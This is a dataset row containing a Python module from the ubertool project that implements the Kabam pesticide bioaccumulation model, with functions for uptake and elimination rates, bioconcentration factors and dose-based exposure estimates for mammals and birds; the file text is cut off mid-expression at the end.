Dataset schema (one row per source file):
repo_name: string (lengths 5-92) | path: string (lengths 4-221) | copies: string (19 classes) | size: string (lengths 4-6) | content: string (lengths 766-896k) | license: string (15 classes) | hash: int64 (-9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean: float64 (6.51-99.9) | line_max: int64 (32-997) | alpha_frac: float64 (0.25-0.96) | autogenerated: bool (1 class) | ratio: float64 (1.5-13.6) | config_test: bool (2 classes) | has_no_keywords: bool (2 classes) | few_assignments: bool (1 class)
repo: puruckertom/ubertool | path: ubertool/kabam/kabam_functions.py | copies: 1 | size: 42339
from __future__ import division #brings in Python 3.0 mixed type calculation rules
from functools import wraps
import logging
import numpy as np
import pandas as pd
import time
from math import exp
class KabamFunctions(object):
"""
Function class for Kabam.
"""
def __init__(self):
"""Class representing the functions for Kabam"""
super(KabamFunctions, self).__init__()
def percent_to_frac(self, percent):
fraction = percent / 100.
return fraction
def ventilation_rate(self, wet_wgt):
"""
:description Ventilation rate of aquatic animal
:unit L/d
:expression Kabam Eq. A5.2b (Gv)
:param wet_wgt: wet weight of animal (kg)
:param conc_do: concentration of dissolved oxygen (mg O2/L)
:return:
"""
vent_rate = pd.Series([], dtype = 'float')
vent_rate = (1400.0 * ((wet_wgt ** 0.65) / self.conc_do))
return vent_rate
def pest_uptake_eff_bygills(self):
"""
:description Pesticide uptake efficiency by gills
:unit fraction
:expression Kabam Eq. A5.2a (Ew)
:param kow: octanol-water partition coefficient ()
:return:
"""
pest_uptake_eff_bygills = pd.Series([], dtype = 'float')
pest_uptake_eff_bygills = (1 / (1.85 + (155. / self.kow)))
return pest_uptake_eff_bygills
def phytoplankton_k1_calc(self, k_ow):
"""
:description Uptake rate constant through respiratory area for phytoplankton
:unit L/kg*d
:expression Kabam Eq. A5.1 (K1:unique to phytoplankton)
:param 6.0e-5: Parameter 'A' in Eq. A5.1; constant related to resistance to pesticide
uptake through the aqueous phase of plant (days)
:param 5.5: Parameter 'B' in Eq. A5.1; constant related to the resistance to pesticide
uptake through the organic phase of plant (days)
:param k_ow: octanol-water partition coefficient ()
:return:
"""
phyto_k1 = pd.Series([], dtype = 'float')
phyto_k1 = 1 / (6.0e-5 + (5.5 / k_ow))
return phyto_k1
def aq_animal_k1_calc(self, pest_uptake_eff_bygills, vent_rate, wet_wgt):
"""
:description Uptake rate constant through respiratory area for aquatic animals
:unit L/kg*d
:expression Kabam Eq. A5.2 (K1)
:param pest_uptake_eff_bygills: Pesticide uptake efficiency by gills of aquatic animals (fraction)
:param vent_rate: Ventilation rate of aquatic animal (L/d)
:param wet_wgt: wet weight of animal (kg)
:return:
"""
aqueous_animal_k1 = pd.Series([], dtype = 'float')
aqueous_animal_k1 = ((pest_uptake_eff_bygills * vent_rate) / wet_wgt)
return aqueous_animal_k1
def animal_water_part_coef(self, frac_lipid_cont, frac_nlom_cont, frac_water_cont, beta):
"""
:description Organism-Water partition coefficient (based on organism wet weight)
:unit ()
:expression Kabam Eq. A6a (Kbw)
:param frac_lipid_cont: lipid fraction of organism (kg lipid/kg organism wet weight)
:param frac_nlom_cont: non-lipid organic matter (NLOM) fraction of organism (kg NLOM/kg organism wet weight)
:param frac_water_cont: water content of organism (kg water/kg organism wet weight)
:param kow: octanol-water partition coefficient ()
:param beta: proportionality constant expressing the sorption capacity of NLOM or NLOC to
that of octanol (0.35 for phytoplankton; 0.035 for all other aquatic animals)
:return:
"""
part_coef = pd.Series([], dtype = 'float')
part_coef = (frac_lipid_cont * self.kow) + (frac_nlom_cont * beta * self.kow) + frac_water_cont
return part_coef
def aq_animal_k2_calc(self, aq_animal_k1, animal_water_part_coef):
"""
:description Elimination rate constant through the respiratory area
:unit (per day)
:expression Kabam Eq. A6 (K2)
:param aq_animal_k1: Uptake rate constant through respiratory area for aquatic animals, including phytoplankton (L/kg*d)
:param animal_water_part_coef: Organism-Water partition coefficient, Kbw (based on organism wet weight) ()
:return:
"""
aq_animal_k2 = pd.Series([], dtype = 'float')
aq_animal_k2 = aq_animal_k1 / animal_water_part_coef
return aq_animal_k2
def animal_grow_rate_const(self, wet_wgt):
"""
:description Aquatic animal/organism growth rate constant
:unit (per day)
:expression Kabam Eq. A7.1 & A7.2
:param wet_wgt: wet weight of animal/organism (kg)
:param water_temp: water temperature (degrees C)
:note the loop here could be moved to the main routine with the
coefficient (i.e., 0.0005 or 0.00251) provided through a calling argument
:return:
"""
growth_rate = pd.Series(np.nan, index=list(range(len(self.water_temp))), dtype = 'float')
for i in range(len(self.water_temp)): #loop through model simulation runs
if self.water_temp[i] < 17.5:
growth_rate[i] = 0.0005 * (wet_wgt[i] ** -0.2)
else:
growth_rate[i] = 0.00251 * (wet_wgt[i] ** -0.2)
return growth_rate
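# Editorial note (a hedged sketch, not original code): the temperature branch
# above can be vectorized, removing the per-simulation loop, e.g.
#
#     coeff = np.where(self.water_temp < 17.5, 0.0005, 0.00251)
#     growth_rate = pd.Series(coeff * (wet_wgt ** -0.2), dtype='float')
#
# assuming water_temp and wet_wgt are equal-length pandas Series.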
def dietary_trans_eff(self):
"""
:description Aquatic animal/organism dietary pesticide transfer efficiency
:unit fraction
:expression Kabam Eq. A8a (Ed)
:param kow: octanol-water partition coefficient ()
:return:
"""
trans_eff = pd.Series([], dtype = 'float')
trans_eff = 1 / (.0000003 * self.kow + 2.0)
return trans_eff
def aq_animal_feeding_rate(self, wet_wgt):
"""
:description Aquatic animal feeding rate (except filterfeeders)
:unit kg/d
:expression Kabam Eq. A8b1 (Gd)
:param wet_wgt: wet weight of animal/organism (kg)
:return:
"""
feeding_rate = pd.Series([], dtype = 'float')
for i in range(len(self.water_temp)):
feeding_rate[i] = 0.022 * wet_wgt[i] ** 0.85 * exp(0.06 * self.water_temp[i])
return feeding_rate
def filterfeeders_feeding_rate(self):
"""
:description Filter feeder feeding rate
:unit kg/d
:expression Kabam Eq. A8b2 (Gd)
:param self.gv_filterfeeders: filterfeeder ventilation rate (L/d)
:param self.conc_ss: Concentration of Suspended Solids (Css - kg/L)
:param particle_scav_eff: efficiency of scavenging of particles absorbed from water (fraction)
:return:
"""
feeding_rate = pd.Series([], dtype = 'float')
feeding_rate = self.gv_filterfeeders * self.conc_ss * self.particle_scav_eff
return feeding_rate
def diet_uptake_rate_const(self, dietary_trans_eff, feeding_rate, wet_wgt):
"""
:description Pesticide uptake rate constant for uptake through ingestion of food rate
:unit kg food/kg organism - day
:expression Kabam Eq. A8 (kD)
:param wet_wgt: wet weight of aquatic animal/organism (kg)
:param dietary_trans_eff: dietary pesticide transfer efficiency (fraction)
:param feeding_rate: animal/organism feeding rate (kg/d)
:return:
"""
dietary_uptake_constant = pd.Series([], dtype = 'float')
dietary_uptake_constant = dietary_trans_eff * feeding_rate / wet_wgt
return dietary_uptake_constant
def overall_diet_content(self, diet_fraction, content_fraction):
"""
:description Overall fraction of aquatic animal/organism diet attributed to diet food component (i.e., lipids or NLOM or water)
:unit kg diet / kg organism
:expression not shown in Kabam documentation: it is associated with Kabam Eq. A9
overall_diet_content is equal to the sum over dietary elements
: of (fraction of diet) * (content in diet element); for example zooplankton ingest sediment and
: phytoplankton, thus the overall lipid content of the zooplankton diet equals
: (fraction of sediment in zooplankton diet) * (fraction of lipids in sediment) +
: (fraction of phytoplankton in zooplankton diet) * (fraction of lipids in phytoplankton)
:param diet_fraction: list of values representing fractions of aquatic animal/organism diet attributed
to each element (prey) of diet
:param content_fraction: list of values representing fraction of diet element (prey) attributed to a specific
component of that diet element (e.g., lipid, NLOM, or water)
:return:
"""
overall_diet_fraction = 0.0
for i in range(len(diet_fraction)):
overall_diet_fraction = overall_diet_fraction + diet_fraction[i] * content_fraction[i]
return overall_diet_fraction
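# Editorial note (hedged): the accumulation loop above is a weighted sum; for
# equal-length array-like inputs it is equivalent to
#
#     overall_diet_fraction = np.dot(diet_fraction, content_fraction)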
def fecal_egestion_rate_factor(self, epsilonL, epsilonN, epsilonW, diet_lipid, diet_nlom, diet_water):
"""
:description Aquatic animal/organism egestion rate of fecal matter factor (to be multiplied by the
feeding rate to calculate egestion rate of fecal matter)
:unit (kg feces)/(kg diet)
:expression Kabam Eq. A9 (GF)
:param epsilonL: dietary assimilation rate of lipids (fraction)
:param epsilonN: dietary assimilation rate of NLOM (fraction)
:param epsilonW: dietary assimilation rate of water (fraction)
:param diet_lipid: lipid content of aquatic animal/organism diet (fraction)
:param diet_nlom: NLOM content of aquatic animal/organism diet (fraction)
:param diet_water: water content of aquatic animal/organism diet (fraction)
:return:
"""
rate_factor = pd.Series([], dtype = 'float')
rate_factor = (((1. - epsilonL) * diet_lipid) + ((1. - epsilonN) * diet_nlom) + (
(1. - epsilonW) * diet_water))
return rate_factor
def diet_elements_gut(self, epsilon, overall_diet_content, egestion_rate_factor):
"""
:description Fraction of diet elements (i.e., lipid, NLOM, water) in the gut
:unit (kg lipid) / (kg digested wet weight)
:expression Kabam Eq. A9 (VLG, VNG, VWG)
:param epsilon: relevant dietary assimilation rate (fraction)
:param overall_diet_content: relevant overall diet content of diet element, e.g., lipid/nlom/water (kg/kg)
:param egestion_rate_factor: relevant aquatic animal/organism egestion rate of fecal matter factor
:return:
"""
gut_content = pd.Series([], dtype = 'float')
try:
gut_content = ((1. - epsilon) * overall_diet_content) / egestion_rate_factor
except ZeroDivisionError:
print('Likely divide by zero in routine diet_elements_gut')
return gut_content
def gut_organism_partition_coef(self, gut_lipid, gut_nlom, gut_water, pest_kow, beta,
organism_lipid, organism_nlom, organism_water):
"""
:description Partition coefficient of the pesticide between the gastrointestinal tract and the organism
:unit none
:expression Kabam Eq. A9 (KGB)
:param gut_lipid: lipid content in the gut
:param gut_nlom: nlom content in the gut
:param gut_water: water content in the gut
:param pest_kow: pesticide Kow
:param beta: proportionality constant expressing the sorption capacity of NLOM to that of octanol
:param organism_lipid: lipid content in the whole organism
:param organism_nlom: nlom content in the whole organism
:param organism_water: water content in the whole organism
:return:
"""
part_coef = pd.Series([], dtype = 'float')
part_coef = (pest_kow * (gut_lipid + beta * gut_nlom) + gut_water) / \
(pest_kow * (organism_lipid + beta * organism_nlom) + organism_water)
return part_coef
def fecal_elim_rate_const(self, fecal_egestion_rate, diet_trans_eff, part_coef, wet_wgt):
"""
:description Rate constant for elimination of the pesticide through excretion of contaminated feces
:unit per day
:expression Kabam Eq. A9
:param fecal_egestion_rate: egestion rate of fecal matter (kg feces)/(kg organism-day)
:param diet_trans_eff: dietary pesticide transfer efficiency (fraction)
:param part_coef: gut - partition coefficient of the pesticide between the gastrointestinal tract
and the organism (-)
:param wet_wgt: wet weight of organism (kg)
:return:
"""
elim_rate_const = pd.Series([], dtype = 'float')
elim_rate_const = fecal_egestion_rate * diet_trans_eff * (part_coef / wet_wgt)
return elim_rate_const
def frac_pest_freely_diss(self):
"""
:description Calculate Fraction of pesticide freely dissolved in water column (that can be
absorbed via membrane diffusion)
:unit fraction
:expression Kabam Eq. A2
:param conc_poc: Concentration of Particulate Organic Carbon in water column (kg OC/L)
:param kow: octanol-water partition coefficient (-)
:param conc_doc: Concentration of Dissolved Organic Carbon in water column (kg OC/L)
:return:
"""
frac_diss = pd.Series([], dtype = 'float')
frac_diss = 1 / (1 + (self.conc_poc * self.alpha_poc * self.kow) + (self.conc_doc * self.alpha_doc * self.kow))
return frac_diss
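# Editorial restatement of Kabam Eq. A2 as implemented above:
#     phi = 1 / (1 + Cpoc * alpha_poc * Kow + Cdoc * alpha_doc * Kow)
# where Cpoc/Cdoc are the POC/DOC concentrations (kg OC/L) and alpha_poc /
# alpha_doc are the corresponding proportionality constants.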
def conc_freely_diss_watercol(self):
"""
:description Concentration of freely dissolved pesticide in overlying water column
:unit g/L
:expression Kabam A1 (product of terms - [phi * water_column_eec], used in Eqs F2 & F4)
:param phi: Fraction of pesticide freely dissolved in water column (that can be
absorbed via membrane diffusion) (fraction)
:param water_column_eec: Water Column 1-in-10 year EECs (ug/L)
:return:
"""
freely_dissolved_conc = pd.Series([], dtype='float')
freely_dissolved_conc = self.phi * self.water_column_eec
return freely_dissolved_conc
def conc_sed_norm_4oc(self):
"""
:description Pesticide concentration in sediment normalized for organic carbon
:unit ug/(kg OC)
:expression Kabam Eq. A4a
:param pore_water_eec: freely dissolved pesticide concentration in sediment pore water (ug/L)
:param k_oc: organic carbon partition coefficient (L/kg OC)
:Note units here are in ug/kg as opposed to g/kg as in OPP spreadsheet; this is just to be consistent with
other units used throughout
:return:
"""
conc_diss_sed = pd.Series([], dtype = 'float')
conc_diss_sed = self.k_oc * self.pore_water_eec
return conc_diss_sed
def conc_sed_dry_wgt(self):
"""
:description Calculate concentration of pesticide in solid portion of sediment
:unit ug/(kg dry sediment)
:expression Kabam Eq. A4
:param c_soc: pesticide concentration in sediment normalized for organic carbon ug/(kg OC)
:param sediment_oc: fraction organic carbon in sediment (fraction)
:Note units here are in ug/kg as opposed to g/kg as in OPP spreadsheet; this is just to be consistent with
other units used throughout
:return:
"""
conc_sed = pd.Series([], dtype = 'float')
conc_sed = self.c_soc * self.sediment_oc_frac
return conc_sed
def diet_pest_conc(self, prey_frac, prey_pest_conc, diet_lipid_frac):
"""
:description Overall concentration of pesticide in aquatic animal/organism diet and
lipid normalized overall concentration of pesticide in aquatic animal/organism diet
:unit g/(kg wet weight)
:expression Kabam Eq. A1 (SUM(Pi * CDi))
:param prey_frac: fraction of diet containing prey i (Pi in Eq. A1)
:param prey_pest_conc: concentration of pesticide in prey i (CDi in Eq. A1)
:param diet_lipid_frac: fraction of animal/organism that is lipid
:return:
"""
overall_diet_conc = pd.Series([], dtype = 'float')
overall_lipid_norm_conc = pd.Series([], dtype = 'float')
overall_diet_conc = len(prey_frac) * [0.0]
overall_lipid_norm_conc = len(prey_frac) * [0.0]
for j in range(len(prey_frac)): # process model simulation runs
for i in range(len(prey_frac[j])): # process individual prey items
prey_conc = prey_frac[j][i] * prey_pest_conc[j][i]
if (diet_lipid_frac[j][i] > 0.0):
lipid_norm_prey_conc = prey_conc / diet_lipid_frac[j][i]
else:
lipid_norm_prey_conc = 0.0
overall_diet_conc[j] = overall_diet_conc[j] + prey_conc
overall_lipid_norm_conc[j] = overall_lipid_norm_conc[j] + lipid_norm_prey_conc
return overall_diet_conc, overall_lipid_norm_conc
def pest_conc_organism(self, k1, k2, kD, kE, kG, kM, mP, mO, pest_diet_conc):
"""
:description Concentration of pesticide in aquatic animal/organism
:unit ug/(kg wet weight)
:expression Kabam Eq. A1 (CB)
:param k1: pesticide uptake rate constant through respiratory area (gills, skin) (L/kg-d)
:param k2: rate constant for elimination of the pesticide through the respiratory area (gills, skin) (/d)
:param kD: pesticide uptake rate constant for uptake through ingestion of food (kg food/(kg organism - day)
:param kE: rate constant for elimination of the pesticide through excretion of feces (/d)
:param kG: animal/organism growth rate constant (/d)
:param kM: rate constant for pesticide metabolic transformation (/d)
:param mP: fraction of respiratory ventilation that involves pore-water of sediment (fraction)
:param mO: fraction of respiratory ventilation that involves overlying water; 1-mP (fraction)
:param phi: fraction of the overlying water pesticide concentration that is freely dissolved and can be absorbed
via membrane diffusion (fraction)
:param water_column_eec: total pesticide concentration in water column above sediment (ug/L)
:param pore_water_eec: freely dissolved pesticide concentration in pore-water of sediment (ug/L)
:param pest_diet_conc: concentration of pesticide in overall diet of aquatic animal/organism (ug/kg wet weight)
#because phytoplankton have no diet, callers pass kD = 0 so the (kD * SUM(Pi * Cdi)) portion of Eq. A1 drops out for them
:return:
"""
pest_conc_organism = pd.Series([], dtype = 'float')
pest_conc_organism = (k1 * ((mO * self.phi * self.water_column_eec) +
(mP * self.pore_water_eec)) + (kD * pest_diet_conc)) / (k2 + kE + kG + kM)
return pest_conc_organism
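# Editorial restatement of Kabam Eq. A1 as implemented above (callers pass
# kD = 0 for phytoplankton, which have no diet):
#     CB = [k1 * (mO * phi * water_column_eec + mP * pore_water_eec)
#           + kD * pest_diet_conc] / (k2 + kE + kG + kM)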
def lipid_norm_residue_conc(self, total_conc, lipid_content):
"""
:description Lipid normalized pesticide residue in aquatic animal/organism
:unit ug/kg-lipid
:expression represents a factor (CB/VLB) used in Kabam Eqs. F4, F5, & F6
:param total_conc: total pesticide concentration in animal/organism (ug/kg-ww)
:param lipid_content: fraction of animal/organism that is lipid (fraction)
:return:
"""
lipid_norm_conc = pd.Series([], dtype = 'float')
lipid_norm_conc = total_conc / lipid_content
return lipid_norm_conc
def pest_conc_diet_uptake(self, kD, k2, kE, kG, kM, diet_conc):
"""
:description Pesticide concentration in aquatic animal/organism originating from uptake through diet
:unit ug/kg ww
:expression Kabam A1 (with k1 = 0)
:param kD: pesticide uptake rate constant for uptake through ingestion of food (kg food/kg organism - day)
:param diet_conc: overall concentration of pesticide in diet of animal/organism (ug/kg-ww)
:param k2: rate constant for elimination of the pesticide through the respiratory area (gills, skin) (/d)
:param kE: rate constant for elimination of the pesticide through excretion of feces (/d)
:param kG: animal/organism growth rate constant (/d)
:param kM: rate constant for pesticide metabolic transformation (/d)
:return:
"""
pest_conc_from_diet = pd.Series([], dtype = 'float')
pest_conc_from_diet = (kD * diet_conc) / (k2 + kE + kG + kM)
return pest_conc_from_diet
def pest_conc_respir_uptake(self, k1, k2, kE, kG, kM, mP, mO):
"""
:description Pesticide concentration in animal/organism originating from uptake through respiration
:unit ug/kg ww
:expression Kabam A1 (with kD = 0)
:param k1: pesticide uptake rate constant through respiratory area (gills, skin) (L/kg-d)
:param k2: rate constant for elimination of the pesticide through the respiratory area (gills, skin) (/d)
:param kE: rate constant for elimination of the pesticide through excretion of feces (/d)
:param kG: animal/organism growth rate constant (/d)
:param kM: rate constant for pesticide metabolic transformation (/d)
:param mP: fraction of respiratory ventilation that involves pore-water of sediment (fraction)
:param mO: fraction of respiratory ventilation that involves overlying water; 1-mP (fraction)
:param phi: fraction of the overlying water pesticide concentration that is freely dissolved and can be absorbed
via membrane diffusion (fraction)
:param water_column_eec: total pesticide concentration in water column above sediment (ug/L)
:param pore_water_eec: freely dissolved pesticide concentration in pore-water of sediment (ug/L)
:return:
"""
pest_conc_from_respir = pd.Series([], dtype = 'float')
pest_conc_from_respir = (k1 * (mO * self.phi * self.water_column_eec + (mP * self.pore_water_eec))
/ (k2 + kE + kM + kG))
return pest_conc_from_respir
def tot_bioconc_fact(self, k1, k2, mP, mO):
"""
:description Total bioconcentration factor
:unit (ug pesticide/kg ww) / (ug pesticide/L water)
:expression Kabam Eq. F1
:param k1: pesticide uptake rate constant through respiratory area (gills, skin) (L/kg-d)
:param k2: rate constant for elimination of the pesticide through the respiratory area (gills, skin) (/d)
:param mP: fraction of respiratory ventilation that involves pore-water of sediment (fraction)
:param mO: fraction of respiratory ventilation that involves overlying water; 1-mP (fraction)
:param phi: fraction of the overlying water pesticide concentration that is freely dissolved and can be absorbed
via membrane diffusion (fraction)
:param water_column_eec: total pesticide concentration in water column above sediment (ug/L)
:param pore_water_eec: freely dissolved pesticide concentration in pore-water of sediment (ug/L)
:return:
"""
bioconc_fact = pd.Series([], dtype = 'float')
bioconc_fact = (k1 * (mO * self.phi * self.water_column_eec + (mP * self.pore_water_eec)) / k2 )\
/ self.water_column_eec
return bioconc_fact
def lipid_norm_bioconc_fact(self, k1, k2, mP, mO, lipid_content):
"""
:description Lipid normalized bioconcentration factor
:unit (ug pesticide/kg lipid) / (ug pesticide/L water)
:expression Kabam Eq. F2
:param k1: pesticide uptake rate constant through respiratory area (gills, skin) (L/kg-d)
:param k2: rate constant for elimination of the pesticide through the respiratory area (gills, skin) (/d)
:param mP: fraction of respiratory ventilation that involves pore-water of sediment (fraction)
:param mO: fraction of respiratory ventilation that involves overlying water; 1-mP (fraction)
:param lipid_content: fraction of animal/organism that is lipid (fraction)
:param phi: fraction of the overlying water pesticide concentration that is freely dissolved and can be absorbed
via membrane diffusion (fraction)
:param out_free_pest_conc_watercol: freely dissolved pesticide concentration in water column above sediment (ug/L)
:param pore_water_eec: freely dissolved pesticide concentration in pore-water of sediment (ug/L)
:return:
"""
lipid_norm_bcf = pd.Series([], dtype = 'float')
lipid_norm_bcf = ((k1 * (mO * self.out_free_pest_conc_watercol + mP * self.pore_water_eec) / k2 )
/ lipid_content) / self.out_free_pest_conc_watercol
return lipid_norm_bcf
def tot_bioacc_fact(self, pest_conc):
"""
:description Total bioaccumulation factor
:unit (ug pesticide/kg ww) / (ug pesticide/L water)
:expression Kabam Eq. F3
:param pest_conc: Concentration of pesticide in aquatic animal/organism (ug/(kg wet weight))
:param water_column_eec: total pesticide concentration in water column above sediment (ug/L)
:return:
"""
total_bioacc_fact = pd.Series([], dtype = 'float')
total_bioacc_fact = pest_conc / self.water_column_eec
return total_bioacc_fact
def lipid_norm_bioacc_fact(self, pest_conc, lipid_content):
"""
:description Lipid normalized bioaccumulation factor
:unit (ug pesticide/kg lipid) / (ug pesticide/L water)
:expression Kabam Eq. F4
:param pest_conc: Concentration of pesticide in aquatic animal/organism (ug/(kg wet weight))
:param lipid_content: fraction of animal/organism that is lipid (fraction)
:param out_free_pest_conc_watercol: freely dissolved pesticide concentration in water column above sediment (ug/L)
:return:
"""
lipid_norm_baf = pd.Series([], dtype = 'float')
lipid_norm_baf = (pest_conc / lipid_content) / self.out_free_pest_conc_watercol
return lipid_norm_baf
def biota_sed_acc_fact(self, pest_conc, lipid_content): #cdsafl
"""
:description Biota-sediment accumulation factor
:unit (ug pesticide/kg lipid) / (ug pesticide/kg OC)
:expression Kabam Eq. F5
:param pest_conc: Concentration of pesticide in aquatic animal/organism (ug/(kg wet weight))
:param lipid_content: fraction of animal/organism that is lipid (fraction)
:param c_soc Pesticide concentration in sediment normalized for organic carbon content (ug/kg OC)
:return:
"""
sediment_acc_fact = pd.Series([], dtype = 'float')
#conversions not necessary, included for consistency of units use
sediment_acc_fact = (pest_conc / lipid_content) / self.c_soc
return sediment_acc_fact
def biomag_fact(self, pest_conc, lipid_content, lipid_norm_diet_conc):
"""
:description Biomagnification factor
:unit (ug pesticide/kg lipid) / (ug pesticide/kg lipid)
:expression Kabam Eq. F6
:param pest_conc: Concentration of pesticide in aquatic animal/organism (ug/(kg wet weight))
:param lipid_content: fraction of animal/organism that is lipid (fraction)
:param lipid_norm_diet_conc: lipid normalized concentration of pesticide in the animal/organism diet (ug/(kg lipid))
:return:
"""
#biomag_fact = pd.Series([], dtype = 'float')
biomag_fact = pd.Series((pest_conc / lipid_content) / lipid_norm_diet_conc, dtype = 'float')
return biomag_fact
#############################################################################
#############################################################################
#this method is not created in final Kabam model; the mweight array is created in 'set_global_constants' method
#and the conversion of concentrations (self.cb_*) is performed in the main routine
# # Mammals EECs
# def mweight_f(self):
# """
# Mammals
# :return:
# """
# self.cb_a = np.array(
# [[self.cb_phytoplankton, self.cb_zoo, self.cb_beninv, self.cb_ff, self.cb_sf, self.cb_mf, self.cb_lf]])
# self.cb_a2 = self.cb_a * 1000000
# # array of mammal weights
# #[fog/water shrew,rice rat/star-nosed mole,small mink,large mink,small river otter ,large river otter]
# self.mweight = np.array([[0.018, 0.085, 0.45, 1.8, 5, 15]])
# return self.mweight
##############################################################################
def dry_food_ingest_rate_mammals(self):
"""
:description dry food ingestion rate: Mammals (kg dry food/kg-bw day)
:unit (kg dry food / kg-bw day)
:expression Kabam Eq. G1
:param mammal_weights: body weight of mammal (kg)
:notes because mammal weights are represented as constants (hardwired in the code) this
method is not designed for matrix/parallel processing; if the weights are
changed to inputs this method would be modified by removing the array structure and
inserting a simulation-based loop in the main model routine
:return:
"""
ingestion_rate = np.array([], dtype = 'float')
ingestion_rate = (0.0687 * self.mammal_weights ** 0.822) / self.mammal_weights
return ingestion_rate
def dry_food_ingest_rate_birds(self):
"""
:description dry food ingestion rate: Birds (kg dry food/kg-bw day)
:unit (kg dry food / kg-bw day)
:expression Kabam Eq. G2
:param bird_weights: body weight of bird (kg)
:notes because bird weights are represented as constants (hardwired in the code) this
method is not designed for matrix/parallel processing; if the weights are
changed to inputs this method would be modified by removing the array structure and
inserting a simulation-based loop in the main model routine
:return:
"""
ingestion_rate_birds = np.array([], dtype = 'float')
ingestion_rate_birds = (0.0582 * self.bird_weights ** 0.651) / self.bird_weights
return ingestion_rate_birds
def wet_food_ingestion_rates(self, prey_water_contents, diet_fractions, dry_food_ingestion_rates):
"""
:description wet food ingestion rate for mammals and birds
:unit (kg food ww / kg-bw day)
:expression Kabam Eq. G3
:param prey_water_contents: fraction of prey body weights that are water
:param diet_fractions: fraction of predator (mammal or bird) diet attributed to individual prey
:param dry_food_ingestion_rates: predator (mammal or bird) dry food ingestion rate (kg food dw / kg-bw day)
:return:
"""
wet_food_ingest_rates = np.array([], dtype = 'float')
factor_1 = np.array([], dtype = 'float')
factor_2 = np.array([], dtype = 'float')
factor_3 = np.array([], dtype = 'float')
factor_4 = np.array([], dtype = 'float')
# calculate elemental factors of Kabam Eq. G3
factor_1 = diet_fractions * prey_water_contents
factor_2 = np.cumsum(factor_1, axis=1)
factor_3 = factor_2[:, 6] # selects the seventh column of the array, which holds the cumulative sum of the products over the seven diet items
factor_4 = 1. - factor_3
# wet food ingestion rate
wet_food_ingest_rates = dry_food_ingestion_rates / factor_4
return wet_food_ingest_rates
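# Editorial note (hedged): with exactly seven diet items per row, the
# cumsum-then-seventh-column idiom above is just a row sum; an equivalent,
# index-free form would be
#
#     factor_4 = 1. - np.sum(diet_fractions * prey_water_contents, axis=1)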
def drinking_water_intake_mammals(self):
"""
:description drinking water ingestion rate: Mammals
:unit (L / day)
:expression Kabam Eq. G4
:param mammal_weights: body weight of mammal (kg)
:return:
"""
water_ingestion_rate_mammals = np.array([], dtype = 'float')
water_ingestion_rate_mammals = (0.099 * self.mammal_weights ** 0.90)
return water_ingestion_rate_mammals
def drinking_water_intake_birds(self):
"""
:description drinking water ingestion rate: Birds
:unit (L / day)
:expression Kabam Eq. G5
:param bird_weights: body weight of bird (kg)
:return:
"""
water_ingestion_rate_birds = np.array([], dtype = 'float')
water_ingestion_rate_birds = (0.059 * self.bird_weights ** 0.67)
return water_ingestion_rate_birds
def dose_based_eec(self, wc_eec, pest_conc_diet, diet_fraction, wet_food_ingest_rate, water_ingest_rate, body_weight):
"""
:description dose-based EECs
:unit (mg pesticide / kg-bw day)
:expression Kabam Eq. G6
:param wc_eec: water column eec (ug/L)
:param pest_conc_diet: overall concentration of pesticide in predator (mammal or bird) diet (ug pesticide/kg-bw)
:param diet_fraction: fraction of aquatic animal/organism in diet of predator
:param wet_food_ingest_rate: overall food ingestion rate (wet based) of predator (kg food ww/kg-bw day)
:param water_ingest_rate: drinking water ingestion rate (L/day)
:param body_weight: body weight of predator (kg)
:return:
"""
frac_diet_conc = np.array([], dtype = 'float')
sum_diet_fracs = np.array([], dtype = 'float')
overall_diet_conc = np.array([], dtype = 'float')
dose_based_eec = np.array([], dtype = 'float')
#calculate relevant factors
frac_diet_conc = pest_conc_diet * diet_fraction
sum_diet_fracs = np.cumsum(frac_diet_conc, axis=1)
overall_diet_conc = sum_diet_fracs[:, 6]
# dose based EEC (the /1000 converts ug to mg)
dose_based_eec = (overall_diet_conc / 1000.) * wet_food_ingest_rate + \
(((wc_eec / 1000.) * water_ingest_rate) / body_weight)
return dose_based_eec
def dietary_based_eec(self, pest_conc_diet, diet_fraction):
"""
:description dietary-based EECs
:unit (mg pesticide / kg-diet ww)
:expression Kabam Eq. G7
:param pest_conc_diet: overall concentration of pesticide in predator (mammal or bird) diet (ug pesticide/kg-bw)
:param diet_fraction: fraction of aquatic animal/organism in diet of predator
:return:
"""
frac_diet_conc = np.array([], dtype = 'float')
sum_diet_fracs = np.array([], dtype = 'float')
overall_diet_conc = np.array([], dtype = 'float')
dietary_eec = np.array([], dtype = 'float')
#calculate relevant factors
frac_diet_conc = pest_conc_diet * diet_fraction
sum_diet_fracs = np.cumsum(frac_diet_conc, axis=1)
overall_diet_conc = sum_diet_fracs[:, 6]
# dietary-based EEC (the /1000 converts ug to mg)
dietary_eec = (overall_diet_conc / 1000)
return dietary_eec
def acute_dose_based_tox_mammals(self, ld50_mammal, tested_animal_bw):
"""
:description Dose-based acute toxicity for mammals
:unit (mg/kg-bw)
:expression Kabam Eq. G8
:param ld50_mammal: Mammalian acute oral LD50 (mg/kg-bw)
:param tested_animal_bw: body weight of tested animal (gms)
:param mammal_weights: body weight of assessed animal (kg)
:return:
"""
acute_toxicity_mammal = ld50_mammal * ((tested_animal_bw / 1000.) / self.mammal_weights) ** 0.25
return acute_toxicity_mammal
def acute_dose_based_tox_birds(self, ld50_bird, tested_bird_bw, scaling_factor):
"""
:description Dose-based acute toxicity for birds
:unit (mg/kg-bw)
:expression Kabam Eq. G9
:param ld50_bird: avian acute oral LD50 (mg/kg-bw)
:param tested_bird_bw: body weight of tested bird (gms)
:param bird_weights: body weight of assessed bird (kg)
:param scaling_factor: Chemical Specific Mineau scaling factor ()
:return:
"""
acute_toxicity_bird = pd.Series([], dtype = 'float')
acute_toxicity_bird = ld50_bird * ((self.bird_weights / (tested_bird_bw / 1000.)) ** (scaling_factor - 1.))
return acute_toxicity_bird
def chronic_dose_based_tox_mammals(self, mammalian_chronic_endpt, mammalian_chronic_endpt_unit, tested_mammal_bw):
"""
:description Dose-based chronic toxicity for mammals
:unit (mg/kg-bw)
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param mammalian_chronic_endpt: chronic endpoint for mammals (ppm or mg/kg-bw)
:param mammalian_chronic_endpt_unit: ppm or mg/kg-bw
:param tested_mammal_bw: body weight of tested mammal (gms)
:param mammal_weights: body weight of assessed mammal(kg)
:return:
"""
chronic_toxicity = pd.Series([], dtype = 'float')
# the /1000 converts gms to kg; the /20 converts a dietary concentration (ppm, i.e., mg/kg-diet) to a dose (mg/kg-bw)
if (mammalian_chronic_endpt_unit == 'ppm'):
chronic_toxicity = (mammalian_chronic_endpt / 20) * (((
